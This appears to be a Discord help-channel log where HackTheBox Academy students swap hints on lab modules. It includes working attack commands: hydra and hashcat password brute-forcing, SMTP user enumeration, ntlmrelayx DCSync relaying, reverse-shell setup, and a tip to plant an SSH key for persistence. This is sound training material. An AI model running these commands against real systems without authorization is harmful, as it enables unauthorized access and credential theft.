#modules

pls share new tools

no

😦

git gud, join private communities

tool and resource share

Folks... on Footprinting / SMTP ... I am not able to answer the 2nd question (with the tool and provided resource). metasploit modules does it for me, using same resource. Can someome DM me?

u are in the right way to get arrested when u re 18

sure

if u wanna be black hat at least learn evasion first

or ur career gonna be short

Lol

i have protonvpn

more than enough then

smh

The updated linux privielege escalation is much better now on my pov

lol youre in for a rude awakening one day

192.168.0.7

How did you get the IP of my coffee machine?!

10.1.10.149 actually

Oh class c?

Iirc that's c

I can never remember

Class is related to subnet, not IP scheme.

It's still carried on...

192/172/10 denote the general assignment

but those just indicate private IP space. You could use 10.0.0.0/8 as a class A, or 10.0.1.0/24 as a class C.

yeah but theres still a general "default" convention with em

^ it helps

Also inheritance of parent network

how u going with ur report by the way

madf0x

Thanks for your help!

took sunday evening off. and was exhausted monday evening so I crashed as soon as I got home, still at work today

Im only gunna worry about fillings bits an pieces in over the week and then really double down on Saturday and Sunday to get it to standard

hi , i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"
i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back

u should have it done in 8-10 hours without any problem

yeah but evenings are exhausting to me so im pacing things

u got a lot of time to write it luckily

yup so ima use it

cannot u give much info about that

shouldn't be too hard in my notes i just have

Configure the "reverse_shell_splunk"

can i dm you bro

then i just used tar and uploaded the file while listening

i have no more notes

i guess it was just follow the section

ok thank you

in what port are u listening

maybe the the firewall is blocking it

I checked the section and it is just put ur ip and port in the script and upload it

443

i'm not getting any connections back

did u tar the file

How long did it take?)

yes bro , like the section

reset it

it is too simple to do, it is just change the ip and port, start the listener, convert it to tar and upload it

ok bro

after conpleting linux module, which module did u guys do next

what u need to learn

at first i wanted to do password attacks module

but it has a bunch of prereqs

and then the prereqs of those prereqs have prereqs

then learn the prereqs

can i skip windows fundamentals since ive used windows all my life basically

whats the fastest way of becoming a hacker

why u ask me

do what u want

if u think u dont need to learn about windows then dont learn about it

ok

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

good link, thanks

consistency

so if i study everyday can i become hacker by the time school starts up again

id just recommend following the cpts path even if you dont plan on doing the exam

ok

in 2 months u can become kobe bryant as well

goodnight peeps

I need help with this idea.
In shellcoding tools
the question is
The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the sever with "nc SERVER_IP PORT" to send the shellcode.
Do I need to create my own shellcode? like using exeve? since I tried other standard shellcodes and I get failed to execute shellcode? My best guess is that its too many bytes long. Since I tried msfvenmon without luck

Just from re reading it, I can use one of the tools to generate a shell code. Am I doing something off, since when I test on my pc it works great

I’m working on the Information Gathering skills assessment and am on the last question on subdomain enumeration.

I’m given a clue that a particular string is located in the subdomain. Gobuster has given me several subdomains working from a wordlist. How would I move forward searching for one that contains the string?

It seems the possible formats could be {str}123.app.githubapp.com or app.visit{str}.githubapp.com.

I’m not certain how to approach the problem.

Well never mind. theHarvester was my friend.

anyone free to talk about Exploiting Web Vulnerabilities in Thick-Client Applications. stuck at the first first stage of logging into fatty client .new
constant connection error

You can dm for clarification if you want

Still need help for this.

I have made a little more progress as follows:
||- Creation of accounts with "admin" prefix is forbidden, however there are no accounts called "admin" or "administrator" (tried case sensitive as well)

• Creation of guest account is forbidden, and there is indeed a account named "guest"
• Enumerated all support.xx from aa-zz (support, support.it, support.uk, support.cn, support.gr)
• For each of the above support accounts, and guest, I encoded the cookie properly with the role (i created a larger list of case-sensitive roles, such as super, superuser, sudo, root, admin, Admin, administrator, Administrator, staff, manager, etc.etc.)
• I also received the message "time to roll up your sleeves and move on" ||

Would appreciate if someone could point out if I'm in a rabbit hole, as I'm unsure if i just have to enumerate more roles or I that im not even close at all

hi so I found the interesting file I'm pretty sure, but not sure how to read whats inside? did you have to escalate your privileges to find the flag or is grep really all you need here?

i dont know what module this is for but running strings on everything is good habit

otherwise, cat or type

Grep + common knowledge of HTB's flag structure

cat <file> | grep HTB

grep -rnw HTB

I have a doubt about Credential Hunting in Linux, The exercise wants us to use hydra and bruteforce the ssh ? using the Resources (Password.txt and Username.txt)?

try to get the password of the support user. Then take a close look at the cookie after login.

Does bloodhound have a way to list all the ACLs of a particular user like the Powerview's Get-DomainObjectACL command?

Anyone Please Help : Attacking Common Applications - Skills Assessment II What is the URL of the WordPress instance? i have found the vhost b*** , but it is not accepting as an answer.

Enter the full URL

can i DM

Sure

not sure if it is intentional, but i found a credential of support.gr account with a working password that deviates from the password policy in the account creation page. (it does not have $#@)
So im assuming if i try the unfiltered 14million list in rockyou.txt i can eventually find the password of support? (since likely it does not follow the traditional password policy as well)
Only thing stopping me from doing that is the occasional 25 seconds delay the login page has to prevent total bruteforce

Thank you.

i already have the working credentials for support.uk but PayloadBunny said to try and find for support (without the country)

after that you need to look at the cookie and see something special. Maybe you can decrypt the cookie

Take a look

i know how the cookies work (including how to decrypt and encode), what's left is enumerating the roles which i mentioned i couldnt in my main help message

can i dm?

ok

thanks for the help

How to learn hacking or can anyone help me to learn

Probably like 2-3 long days of studying

Wow, lol

It says it would take 7 days

Well, you gave me a motivation

With regular hours it would yea

Any help on the last two questions of the Skills Assessment part 2 on Active Directory Enumeration and Attacks? Struggling to get a shell on DC with the user that has GenericAll privs :/

anyone around for some pointers on Footprinting medium chall?

Dm if you'd like

Hi , i need help on Notetaking & Organization, anyone knows why the question Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) is not accepting answer ||[Ctrl] + [B] + [%]||

In the burp intruder section from using weg proxies, I found the index.html but it gives no output, so can’t see a flag

Is there something I’m missing?

you can dm if you want but cant answer til 2 or 3 hours

cause gotta leave the pc

The answer is on the page. I think about half way down

NVM, didn’t do it right

let's not share flags, even if they are non working ones

Hi, I'm in module pivoting in section web server pivoting with rpivot, i did what i should but when i connect to the web server i don't see the flag, can someone help me

I tried what was written on the red line but it gave me the wrong answer

Dm me what you have I'll help

Why does my scan not work?

Only getting errors

Should be fine right

Maybe try gobuster vhost

why are you taking pictures on your phone?

its a boomer thing

what makes you think hes a boomer?

taking pics with phone instead of using lightshot

i did a bit of ffuf on tryhackme and i dont remember having to include a port. maybe thats the prblem

Because I’m on discord on my phone.

But that’s not an answer to my question

Why does it not work?

Provide the module, chapter, and question as well as your full command

Skills assessment - web fuzzing from the attacking web applications with ffuf module

and the command?

Is in the picture

have u tried it with 80 and 443

@valid cipher port given is 32252

Try https with port 32252. If I remember correctly

Hi everyone,

I'm doing Password Attack module, and when attempting to bruteforce SSH with crackmapexec, it seems very slow (1 request / 2-3 seconds).
Is there a way to speed up ? Is it a default parameter for stealth ? Or is it my hardware fault ?
It will take hours just to finish a simple exercise 🙂

Does not work

@analog dock ffuf -w ./wordlist -u http://target.com -H "HOST: FUZZ.target.com" -fs 69420

try something like that.

Yes its vhost this one should work

Thanks

no prob

i thought websites can only listen on 80 and 443

is that not true

no lol

those are just standard ports

you can route

oh

Heyy ....
Anyone has "suse certified administrator" SCA question dumps ?

If you still need help, send me a DM

ive got it already, thanks

?

Try to explain your issues without spoiling anything in terms of potential routes or commands

Well it’s not really a spoiler if it’s wrong right?😅

but it can mislead other users

Anyways I’m at the second question of the skills assessment - Website of module Login brute forcing. Using the user found in question 1, and rockyou as a pass list, it gives me false positives

inspect element and get the name for the form as the example went through

I checked the form with burp suite and changed this accordingly

I sent you a dm

I was dumb

you can view the source code of the page, and see if you can reproduce the same behavior by sending a file that has only the paragraph arguments

example: are you sure you are running php code and not html with that payload?

Doesn't html use <script>?

I was referring to the web server

I need help with logrotate and sudo sections in linux privesc. Can I dm?

Actually only logrotate section. Anyone can help?

Dm me if u want

Thanks

Can anyone help me withv this?

I have a doubt about Credential Hunting in Linux, The exercise wants us to use hydra and bruteforce the ssh ? using the Resources (Password.txt and Username.txt)?

Linux PrivEsc/ Credential Hunting
Find the WordPress database password.

You don't need to bruteforce anything.
Search for the credentials on the machine

This is the module https://academy.hackthebox.com/module/147/section/1320

No web server is running i can only see 21, 22, 139 and 445 ports open

Does anyone know a discord server for hacking, for topics outsite of hack the box scope?

Ah, Password Attacks, not Linux PrivEsc 🙂

You have to create a mutated list with the given password. Then you can bruteforce an access to SSH with it

Legal discord channels are many.
TryHackMe, TCM Security, Kali, Parrot OS, and many others. Just pick a topic and see if they run a Discord channel.

For illegal things, read #rules

I have already created one using hashcat --force pass.txt -r /usr/share/hashcat/rules/best64.rule --stdout | sort -u > mut_password.list

Where pass.txt have the password which was given as a hint

and If i try to use hydra with hydra -l Kira -P mut_password.list -V -t64 ssh://<IP>

Its not working

Do I need to use another rule type?

When you say its not working, do you mean it just continues to run?

it does not give me the correct password from the mutated list

Oh, are you not using the custom.rule file?

I have tried that as well

If you are saying the custom.rule is

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

Did you read the Hint?

I did that is why I m mutating "LoveYou1"

Yes... but the Resources contains a custom file for mutating the password.

You're mutating with one of the standard files.

Right 😦

I was stuck in this form 12 hours

Which Module?

Thanks I will try that

Err, which Chapter in the Module?

Credential Hunting in Linux?

yes

just because I did not see the custom rule attached

Well, I hope that works for you. My notes are a little spotty on that Module

Can I DM you?

I don't think I'll be much help on password attacks. As I said, my notes are very very spotty

okay 😦

I have mutated the password with the custom.rule

That was literally the module that I realised I needed to take better notes

I have already created one using hashcat --force pass.txt -r custom.rule --stdout | sort -u > mut_password.list

Where pass.txt have the password which was given as a hint

and If i try to use hydra with hydra -l Kira -P mut_password.list -V -t64 ssh://<IP>

Its not giving me right password

Just to be clear... you are doing this chapter right? https://academy.hackthebox.com/module/147/section/1320 Credential Hunting in Linux?

yes 🙂

The question being: Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Yes but if you see the hint you will know what I n doing

Just making sure we're on the same page

we are

Oh

You know what it might be

let me check, one moment

Yeah... your 2nd issue is that you are using the username "Kira", not "kira"

I m sorry but I have tried both of them

I m still not sure what is wrong with my list

Try using ftp instead. Its better for testing.

SSH is slower, and has a lot more timeouts

nope its the same

what's in your pass.txt?

LoveYou!

Well

There's your 3rd issue

Its LoveYou1

ahhhhhhhhhhhh

I m sorry

lol

Got it

Thanks Man 🙂

That was so dumb

np. Just glad my notes were up to the challenge.

https://academy.hackthebox.com/module/143/section/1485

I stuck at this when loading the command, after 2-4 mins and still no respond, is this normal?

That one takes a bit, so give it a little time. 3 minutes does sound a little excessive

Maybe worth resetting the environment

never mind, I try to switch it to sharpview, and wait for it

thanks

Hello fellas, I'm having a trouble with the following question in academy: If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

My answer that's "incorrect": ||nvXc100||

You need to provide context when asking questions like this. We have no idea which Module/Chapter you're on. There's literally hundreds of questions in the Academy.

Oh, sorry, the question is from: INTRO TO NETWORK TRAFFIC ANALYSIS, Tcpdump Fundamentals

You need to ||put a dash at the beginning to indicate that the characters are switches, and then you need a space between the letters and the number||.

Thank you!

it's almost 9 mins, it still respond nothing...

Hi guys, any hints for escaping restricted shells section in Linux PE module ?

Hi guys!
Anyone pass footprinting>smtp?
(Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.)
I tryed
sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/common_roots.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /opt/useful/SecLists/Discovery/SNMP/snmp.txt -t 10.129.214.65
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
ismtp -h 10.129.214.65:25 -e /usr/share/metasploit-framework/data/wordlists/unix_users.txt
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65

no luck 😦
any hint here?

can anyone tell me why i am answering questions and i am just starting for?

i am expected to have the answers and im just now starting makes no sense

IIbackwardthe first 3 questions ive answered but they expect me to know what open VPN they use to connect to the labs. i just started and def don't have the answers,now i have to find they answer is a bit backwards learning for me when i do not have the fundamentals yet

where can I suppy a feedback or a simple typo in a module ?

thanks

Hi everyone, I am doing the module Windows Attack & Defense, more precisely the exploitation Print Spooler & NTLM Relaying . I am always trying exploitations in my own home lab to experiment more about the exploitations and patches. In this vulnerability, we use impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support to relay a connection from a DC to another one and try a DCsync. But we can see that NTLMRelayx try to use Zerologon, I don't understand why and the course doesn't tell about it.

I'm first time asking about it

Hi! In the Footprinting module, smtp section I'm having problem to find the user they are requesting

I have tried with nmap script, with metasploit list

I have even tried with bash scripting and telnet vrfy command

I have found quite a lot users but not the one they are requesting

same issue 🙂

again need help with these questions on walkthrough

makes no sense why i am doing this and i just started

with all do respect but this is trash that they make you go through this with NO knowledge base help nor no reading materials been stuck on the same question for over an hour and reading whatever they have on the site but it does not help with questions

Aa yes I checked. But it didn't work 😕

It takes quite some time tbh

Also try hitting enter a few times

Thanks, I got a help from another friends

Cool

I am stuck on what looks like a mal formed question or I may just be crazy...
PIVOTING, TUNNELING, AND PORT FORWARDING > Meterpreter Tunneling & Port Forwarding :
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"

The autoroute output looks like this :

in the format x.x.x.x/x.x.x.x, the only valid route I can see is the second one 172.16.4.0/23 in which 172.16.5.19 is.

When I post that subnet in the form ||172.16.4.0/255.255.254.0|| it tells me I am wrong...

any suggestions please ?

umm... after some extra testing I found the valid answer but I would love to discuss with other people who did that module because it just looks like a question error to me

having problem on the linux privesc with logrotten. anyone to help me quick?

Sure

Hey guys how do you make notes? I thinking of an effective ways to keep the notes. Any tips would be appreciated

I like OneNote. Free and notes are on the cloud. Had horror stories with cherryTree

Obsidian, OneNote, etc.
https://academy.hackthebox.com/module/162/section/1533

this is the note structure I always use for reporting purposes, when pwing a box.

For HTB and training notes? I have it like this

I have Enum 1st, obvious reasons

Then Priv esc, and so on

I document how to do each question with step by step, and each command called:

nice

I took a different approach and extract the topic , as the main goal, at least for me, is use the knowledge for any box. But that is a good idea too.

Of course, that's separate. I've got notes from the module, and the cheat sheets saved. But if I ever need to come back to do a refresher, its easier to replicate from notes, and understand why and how you do something.

the reverse shell isn't showing up on nibbles. I went back and decided to try the privilege escalation section of getting started again. do I have to start over?

Better to move away from cloud-based solutions, since you can't use them for customer data.

if someone could help me get the reverse shell and then you can leave me to keep trying the next step that would be graet

etc

who said is for customer data?

On my case, is for my own notes.

But you can have customer data on the cloud as long as you use proper encryption.

Yeah, but then you end up needing 2 sets of note-taking programs - why not just unify?

And no, you can't just 'encrypt' the data - it depends entirely on contractual obligation.

the cloud is no less or more secure than on premise, it just depends of how you use it .

now you are changing topics, sorry

You can have customer data on the cloud, no issues with that. Is it allowed or not? depends of the contract

Hello, in socks over rdp...
I managed to start the socks plugin on the foothold. From there I connect successfully to the pivot and transfer the socks server. Started it. Verified the listening on the foothold with netstat. Then configured proxifier in socks5. Then it fails to connect to the distant target (172.16.6.155). Mstsc.exe does not appear in the proxifier window either.
How to solve that?

So are you just going to not do contracts that have a customer require your data to be stored locally? There's a reason the course touched on this.

err what. I've never heard of a client okay with cloud based hosting of client info

sorry, you seem to go from one place to another and talking different things

my own note taking, is done on the cloud

keeping customer data on the cloud? it depends of what you sign

It sounds like you're the one confused here. I just said that if you do use a cloud-based note solution, you end up with having to use two note-taking solutions anyway, since all customer data has to be local. You might as well unify, at that point.

my example to the Op was about how I keep my notes for HTB, OSCP and learning

nope, I am not

hi is anyone available for a DM from me so that I can get one on one help with this box?

which box?

nibbles. its for the getting started module.

I meant the nibbles privesc section of getting started module

not actual box

what's the question or what issue are you facing?

its a walkthrough and I am trying to get a reverse shell and I think I missed a step

etc

its not letting me get reverse shell

what's the error? mind posting?

did you check if the port is available?

no error just no reverse shell

which is fine but youre going to have to switch later on if youre going to do client work so why not switch now is all me, rat, and 90% of people doing offensive security are saying

nah, I do not like to keep my own notes locally

personal preference, better backup

that's just me, and again, that's for MY NOTES

I sync my encrypted obsidian notebooks. Got em on my phone, laptop, desktop, and work laptop.

DM me

ok will do thanks

... okay? and? We're trying to point out that you still have to take notes during a penetration test. Those notes will now have to be stored in a second note-taking app, that is local. So... since you already have to use a local solution, why not migrate all your notes to that solution, instead of using two?

anyone here can gimme some hint for assembly data movement task?

I couldn’t find a thread to post this question in, so I’ll ask here and if not allowed I understand. At work today I found an iPhone in a stolen recovery truck. I process the trucks. I’ll detail, do mechanical maintenance and body work to get them ready for retail sale. I’m just wondering if there is a way I can get it unlocked so I can contact the owner to return it to them

some people are just stubborn about doing extra work. Or they just dont care about client data and will get a rude awakening down the line.

read #welcome for verifying account for access to rest of the server

but otherwise no your question about unlocking stolen phones isnt welcome here

It’s not stolen but thanks anyways 👍🏼

drop it off for the police if its genuine

Will do thanks boss

I work in repair and moderate the mbl repair discord, I see your kind of question 10x a day

sorry madf0x, have you done maybe the assembly module?

Ive not but I do know some assembly so ask your question anyways

i have a task to move the value in "rsp" to "rax". I tried with mov rax, [rsp]

got segmentation fault error

which asm flavor

intel

also [] is for dereferencing the address in the register, so youd be transferring data to the memory pointer stored at that location, so it wouldnt be moving the rsp value to rax per say

i see

so drop the [] if you want to straight clone the contents of rsp which may or may not be just a pointer value.

[] for when you want to access the data the pointer points at.

Im guessing your situation may not even involve pointers at all, hence the seg fault for accessing an invalid memory region

i need to have move value from rsp to rax

so [] makes sense here for me

anyway, one day imma figure this out

well not necessarily

[] is for the value of the pointer stored in rsp

no [] is for the raw value stored in rsp

if the contents of rsp = 4, then [] would try to dereference the memory address at 0x00000004 which would be invalid

if the contents of rsp = 0x76100341 and that happens to be a memory address containing the value of 4, then youd use [] to pull the value 4 instead of copying the memory address

hmm i see

idk still but thx for helping tho

best of luck

hello every body, anyone knows how to unzip a file under a RDP Windows machine?

explorer

I'm stuck under the question to calculate the hash of a file in the File Transfer module

I can find winzip or anything like that

what version of Windows

I do not remember, but most recent Win version can unzip that via explorer

after Win2016 I think

another alternative is using PS: Expand-Archive

Expand-Archive -LiteralPath c:\temp\file.zip -DestinationPathC:\temp\file

ty y'all....

but now, anyone knows why this message error [-] SMB2_TREE_CONNECT not found upload_win.zip

could be a .zip restriction/policy under the Windows Machine?

yep

Iḿ not using Kali

ok.

also Im not using xfreerdp instead Im using reminna

switching to xfreerdp

Need a nudge on last flag of final assessment in deserialization module? Figured out the checksum mechanism and found the hidden feature, but seems like my generated payloads arent working 😦

@slender shoal sorry bother you with sally question but, how suppose I can find the /drive: ???

now I'm in xfreerdp

hmm ok.

ty @slender shoal

I really doesn't know about that share folder

is this a xfreerdp feature?

the share will show up in explorer

Htb Academy linux privilege escalation. Enumerate the linux environment and look for interesting files that might contain sensitive files. I am stuck here. I need answers .

Try grepping for something that looks like a flag.

It's also possible to escalate privileges into the lab_adm user, which will point you in the direction of the flag 😉

72 modules done. 8 modules to go! I will get to zero modules.... if they stop releasing new ones! 🙂

Don't know if anyone is available to assist with this. I'm in the dnsadmins section in Windows Priv Esc and I have gone through and restarted the instance several times. No matter how carefully I follow the steps, I can't seem to add myself to the Domain Admins group. Is anyone available to assis with this?

Out of curiosity, how many of those modules did you pay for out of pocket versus getting the trickle-down from the cubes you get by completing a module?

Most were on trickle down + subscription

Subscription more than others

I only had to buy some towards the end.

It depends how hard you go at it. If you are smashing through them, then you'll need more cubes in a month, so higher tier sub is better.

oh so you're also getting the monthly cubes from silver annual (or whatever subscription you have)

Has anyone here made it through the dnsadmin section in Windows Priv Exc? I could really use some help. I don't understand why it's not working.

Yeah, I was on silver. I upped to platinum last month as it was more cost effective, as the t4 modules cost 1,000 modules each.

you would want to use ssh2john to turn it into a hash, and then crack the output of that

but this key isn't even encrypted with a password

so what are you trying to crack

oh wait nvm I'm dumb, I guess keys don't explicitly say that they're encrypted

maybe it's an RSA thing

regardless, ssh2john is your friend, but I don't remember needing to do that during the pivoting lab

did you do chmod 600 id_rsa?

Should very much be following the steps in the lab. I did a shutdown -l after doing all of the permissions changes, which logs you off. You get the permissions when you log on next.

usually theres a header if it is encrypted

That's what I thought but I just generated a new keypair on my system and the header wasn't there

well the ones ive seen in the modules that were encrypted all had a header

That's not the issue. The issue is that I can't even seem to get added to the Domain Admins group at all.

hence why I also said there needed to be a header at first

I realize that once I'm added I need to log off and log back on. I'm not able to even get to that point.

yeah, Im just throwing my chips into the pot that the key being encrypted isnt the cause of Moo's problems

Sadly, I need to goto sleep. If you're still having issues tomorrow, I'll run through my notes to find out what you could be doing wrong.

Okay, thank you. I'll message you tomorrow if I can't figure it out.

just tested it, it's possible for an SSH key to be encrypted without the header, and you can still crack it. Default ssh setup on ubuntu 22.04 🤷‍♂️

cool

To get back to your question, genuinely don't remember needing an SSH key, pretty sure all the credentials you need are on the box. If you really want to use an SSH key (totally valid, great persistence method), just stick your own public key into the authorized_keys file and use that key instead

I find it really hard to learn the material in the way HTB is teaching it. I have no prior Linux knowledge and the questions in the Linux mod dont always line up with what was talked about in the txt. Doesnt help that im more of a visual learner. Any suggestions?

can anyone nudge on file upload skill assessment. I believe i have the correct formatting for the URL, but not finding my test image i uploaded

@slender shoal i was stuck in the Filter Content section in the Linux Fund. for 60min before i said fuck it and looked up the answers. i dont understand how people are comming up with the last command with out prior knowlage

i must have been over looking it. i did man help. even tried screening in in the house lol

HTB content is very much geared towards teaching you a little bit, and then putting you in an unfamiliar situation related to what was taught with the expectation that you reach out of your comfort zone and figure out how to discover the solution on your own.

Hello, in socks over rdp...
I managed to start the socks plugin on the foothold. From there I connect successfully to the pivot and transfer the socks server. Started it. Verified the listening on the foothold with netstat. Then configured proxifier in socks5. Then it fails to connect to the distant target (172.16.6.155). Mstsc.exe does not appear in the proxifier window either.
How to solve that?

@SQLMantra
You can have customer data on the cloud, no issues with that. Is it allowed or not? depends of the contract

Am I making an error in the file upload skill assessment? I cannot view any files I upload. I've also tried at the contact directory.

http://IP/user_F*****_S*******/****28_animal.jpg

Thanks for help

Thanks

anyone know why the python3 uploadserver with default port works

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...```
But with port *443* NOT
```$ sudo python3 -m uploadserver 443
/usr/bin/python3: No module named uploadserver```

under the file transfer module Linux File Transfer Methods section, if the target machine Ubuntu has not options to decompress files with unzip or 7z or any other, what option do we have?

yes if you still need help with this get back with me

DM if that's needed

Hey everyone! I am struggling with "Login Brute Forcing" module and I am currently doing the 2nd flag in the "Skill Assessment - Website" section.
The task is: "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?".
The hint is: ||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters". The username the hint is talking about is "user" cause that is the username that is used for the previous flag, also I have checked the parameters of the form and they are: user and pass but I'm not really sure what the hint talks about with "fail string".||
I am trying to execute the code: ||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f HOST -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='admin_panel'"|| and the correct password seems to be ||123456789||.. but when I try it out in the form, it does not work at all.. what am I doing wrong here?

Hydra will give false postivies sometimes.

You may find a similar question here: #modules message

you can dm me if u need additional help

Thank you! I thought that might be the meaning of those words in the hints, but I think it's phrased a bit poorly.. isn't it? Why would you call false positives "fail string"?

false positive - hydra tells you it found working credentials when in fact it did not

Thanks, that solved it for me!

I know what false positive means, what I was saying is that the hint doesn't say "false positive" instead it talks about "fail string" which sounds like something different

fail string is not false positive, but a wrong fail string causes false positives

Ive used hydra alot even on real engagements a few times its given me false positives

Need a little help with this one... Please
Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?
User and Group Management section, INTRODUCTION TO WINDOWS COMMAND LINE
hint was: Get-ADUser Cmdlet along with a "-Filter"

Are there official walkthroughs on the module questions and labs anywhere?

I'm getting tired of searching for bits and pieces of information on each question.

I think not. If only to Tier 0
See also:
https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

the hint is clear use Get-ADUser with the filter tag and if you don't know what to filter for just use * to get all of them and the question did give you a username, you can use that with the ||-Identity|| tag

if you are stuck you can just ask here or lookup the same question that others has ask here before

Thanks, I figured it out, was having issues with the FTP footprinting

They tell you to submit the whole banner, but by that they mean the whole banner minus the "200"

200 is status code, not part of the banner

They also didn't explain the portion where it asks you for an email as password for the anonymous login.

So I just figured that out on the fly I guess.

Anonymous is just anonymous

¯_(ツ)_/¯

yeah, but it asked for a password and I bypassed it by just hitting enter

Yes

it would have been nice if the lesson explained that

Thats how anonymous works

Just wasn't explained

not all things are explained in modules ¯_(ツ)_/¯

But put it in this perspective: how can you log in as anonymous if it's password protected.

Yeah, that's too bad, good thing I have some background knowledge.

it's not about having background knowledge. Sometimes it's just the obvious solution is correct ¯_(ツ)_/¯

Thank you

Well I did a couple of learning paths on Tryhackme before coming over to HTB Academy, so that helps.

Even though Tryhackme is garbage in comparison to HTB Academy.

I had (virtually) no experience prior to htb

yea sorry but you haven't done nearly enough on either platform to judge neither

Module name: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section name: Domain Trusts Primer
Question:
What SharpHound command should I use so that bloodhound can map domain trusts like what is shown in the picture in the "Visualizing Trust Relationships in BloodHound" subsection?

Currently I run .\SharpHound.exe -c ALL --searchforest --zipfilename <file>, but I get "NO DATA RETURNED FROM QUERY" when I tried to use the "Map Domain Trust" analysis option on bloodhound

Hello

Stuck In Password attacks “Passwd, Shadow & Opasswd”

I have got the shadow and passwd files.

For cracking purpose, i m using hashcat -m 1800 -a 0 unshadowed.hashes /home/username/Downloads/mut_password2.list -o /unshadowed.cracked

and the mutpassword2.list is generated from using hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password2.list

here the custom.rule was used from the resources. Am I missing something?

PLease ignore, I found the answer 🙂

Hi, can someone help me on 'Exploiting Web Vulnerabilities in Thick-Client Applications'? i am on the last part where i should amending 'user.java' but i think i am not editing it correctly. can someone advise? should i be adding the portion in or overwrite the existing content of the classes?

any attack for httponly if it is not set

can we get rev shell?

Hey i wanted to ask the question that the Mac address here returned in the output is if the target host, right? What if the attacker and target both are on the same network ? Then the Mac address returned is will be of whom ? Attacker or target?? Can we confirm it by checking and matching the attacker (our) Mac address with returned Mac address

I can't send the pic here **

yes

Skill Assessment - Web Proxies, Why cant I get the flag, it tells me to enable the button and click it to get the flag, but i have done that and it just reloads the page with the exact same data

Enable the button, and when you did that, intercept with burp

I have enabled the button

Send to repeater and keep trying

With ZAP

Hint says you have to click more often right?

Aaaaaaaaaa

So send it to repeater and try till you see content length change

Oke

doing password attacks and cannot get hydra to compile with ssl support

I have been trying to follow the instructions on the github

pw

but some of the packages are not availble

Aaa

Got it now

Thanks

first http://dontasktoask.com/ and which section are you on? what are you trying do to? and what exactly is the issue?

I am supposed to decode this until i get a 31 character string, how does this help? Its the only value I can get using burp

read #welcome and #rules after use /verify at #bot-commands and if you are having issue on thm pls don't ask here

lets change gears: where specifically can I get the resources on the pwnbox for a module I am doing

I tried to decode it as base64

I got the answer brother thanks

feel free to shoot me a dm if you still need help

e.g. I am doing password attacks, network services & just need to the resources that are in the module on the pwnbox.

so you issue is you can't get the resources on to the pwnbox?

just wget the resource link on the pwnbox

my original issue was I am using my own version of kali and hydra was not compile so that I couldnt finish part of the module. I tried to compile from source but as certain libs were not avaible, I ended up down a rabbit hole of trying to troubleshoot when I can just in fact use the pwn box.

Thanks

I had originally done a simple python http server on my own machine on the vpn but was getting a 405 error when using wget from pwn

if you are on kali did you try sudo apt install hydra ?

Nvm I found the answer

yeah but for some reason it was thrown up the error [ERROR] Compiled without OPENSSL support, module not available!

so was going to compile from source instead

got frustrated and didn't even think to wget the resources link

thanks

also not sure about kali but a quick purge and compile hydra from source worked for me on the pwnbox

I tried that but was not playing ball. I was considering switching to parrot anyway so this might have just been the final thing.

Guys are there any similar course like learning mindest of hackers similar to the one in htb academy? Appreciate any help

also just to double check when compiling, it throw a lot of error but it's still work is there any any chance you got a executable named hydra ?

I did get the executable

so it's work for you in the end?

it compiled but without the SSL support needed

despite passing the flags etc

but wait how tf did your kali don't have hydra?? it's one of the default tool

😂😂

WSL2 maybe?

not WSL2

it just wasn't playing ball

so recompiled

yo

I need command to get answer to rhe linux privilege escalation question 1. I have tried different regex commands. I need help

try grep for it

is medusa the only tool you can use for attacking ftp in attacking common services?

i tried hydra with both 64 and 48 threads and i got nothing

hydra worked for me, are you using the provided resource wordlists?

yeah

did u rename the user.list to username.list?

yh thats just what i saved it as

just easier for me personally

what have you tried

cuz if i remember correctly that lab was pretty straightfoward

once u found the archive

maybe try less threads ?

im running it on the default settings rn just wanted to check i wasnt wasting my time

dm?

sure

When I want to run the built chisel binary on the ubuntu server it gives me following error. Does anyone know how to fix this? https://academy.hackthebox.com/module/158/section/1437

did u check md5sum of chisel before/after transfer ?

the same

try with chisel_1.8.1_linux_amd64.gz

that should work but if it doesn't then a trick you can use is you can actually use the installed chisel binary on your kali as portable binary on your target machine

works just fine, thanks. why does this version work though?

no idea but there is some stuff about the arm version need some library that targets machine on HTB doesn't have installed

why would you need to get root? the goal of the lab is getting the flag in that zip file

how do i see at which port it opened the connection now?

and you do have the -v tag on your chisel server right?

yup

maybe its bc of the version?

i'm thinking the same could be the version

or try with socks5 on your chisel client

maybe try reverse proxying?

while it is not displayed, it's still port 1080

but yes, likely the version

but when i add it to proxychains4.conf and try RDP'ng into the DC it does not work

hmm interesting. I believe I simply used port 1080 and it worked

